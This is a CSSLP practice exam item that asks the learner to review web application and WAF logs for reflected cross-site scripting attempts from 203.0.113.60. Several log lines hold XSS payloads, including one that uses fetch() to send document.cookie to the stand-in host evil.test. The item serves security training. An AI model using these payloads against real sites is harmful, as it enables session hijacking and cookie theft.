Log Analysis PBQs: Certified Secure Software Lifecycle Professional (CSSLP)
easyQuestion 1 of 3
You are a software security engineer reviewing web application security logs after the WAF dashboard flagged a spike in blocked requests. The application security team suspects reflected cross-site scripting (XSS) attempts targeting the search functionality. Review the application and WAF logs, flag all entries related to the XSS activity, and classify the incident for the security response team.
Objectives
- •Review the application and WAF logs for cross-site scripting attack attempts
- •Flag all entries showing XSS payloads in requests, including both blocked and bypassed attempts
- •Classify the type of security incident
- •Identify the attacker's source IP address
- •Recommend the most appropriate immediate response action
Security Event Log
| Flag | Time | Severity | Source | Message |
|---|---|---|---|---|
| 14:00:00 | INFO | web | 200 GET /app/dashboard from 192.168.1.50 (authenticated user session) | |
| 14:02:30 | INFO | web | 200 GET /app/search?q=quarterly+report from 192.168.1.50 | |
| 14:05:00 | WARN | web | 400 GET /app/search?q=<script>alert('xss')</script> from 203.0.113.60 -- reflected XSS payload in search parameter | |
| 14:05:05 | ALERT | firewall | WAF block: XSS signature matched in request from 203.0.113.60 to /app/search -- rule ID 941100 (Reflected XSS) | |
| 14:06:30 | WARN | web | 400 GET /app/search?q=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E from 203.0.113.60 -- URL-encoded XSS payload | |
| 14:06:35 | ALERT | firewall | WAF block: XSS signature matched in request from 203.0.113.60 to /app/search -- rule ID 941110 (HTML Event Handler XSS) | |
| 14:07:00 | INFO | system | Application server health: CPU 34%, memory 62%, all services healthy | |
| 14:08:15 | WARN | web | 200 GET /app/search?q=<svg/onload=fetch('https://evil.test/steal?c='+document.cookie)> from 203.0.113.60 -- XSS payload BYPASSED WAF (no rule match) | |
| 14:09:00 | INFO | auth | Successful login: developer01 from 10.30.1.12 to staging environment | |
| 14:10:00 | INFO | web | 200 GET /app/profile from 192.168.1.50 (authenticated user) | |
| 14:11:30 | WARN | web | 200 GET /app/search?q=<iframe+src='javascript:alert(document.domain)'> from 203.0.113.60 -- XSS payload BYPASSED WAF (iframe variant) | |
| 14:12:00 | INFO | system | Log aggregator: application log rotation completed for /var/log/webapp/access.log | |
| 14:13:00 | ALERT | firewall | WAF rate limit: 203.0.113.60 exceeded 20 requests/min to /app/search endpoint -- temporary block applied (5 minutes) |
13 total entries. Click a row or use checkboxes to flag suspicious events.
Incident Analysis
Progress
0 of 8 items correctFlag suspicious entries and answer the incident questions
0 of 3 marked complete